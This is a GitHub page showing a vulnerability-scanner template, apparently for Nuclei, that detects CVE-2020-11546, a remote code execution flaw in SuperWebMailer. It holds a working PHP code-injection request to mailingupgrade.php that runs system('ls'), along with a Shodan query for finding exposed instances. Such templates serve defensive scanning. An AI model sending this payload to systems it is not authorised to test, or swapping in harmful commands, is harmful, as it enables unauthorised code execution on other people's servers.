-
Notifications
You must be signed in to change notification settings - Fork 220
/
Copy pathCVE-2020-11546.yaml
42 lines (37 loc) · 1.28 KB
/
CVE-2020-11546.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
id: CVE-2020-11546
info:
author: Official_BlackHat13
severity: critical
name: SuperWebmailer Remote Code Execution
description: SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection.
tags: cve,cve2020,rce,superwebmailer
reference:
- https://github.com/Official-BlackHat13/CVE-2020-11546/
- https://blog.to.com/advisory-superwebmailer-cve-2020-11546/
- https://nvd.nist.gov/vuln/detail/CVE-2020-11546
metadata:
shodan-query: title:"SuperWebMailer"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-11546
cwe-id: CWE-94
requests:
- raw:
- |
POST /mailingupgrade.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
step=1&Language=de{${system("ls")}}&NextBtn=Weiter+%3E
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- ajax_ccea.php
- ajax_getemailingactions.php
- ajax_getemailtemplates.php
condition: and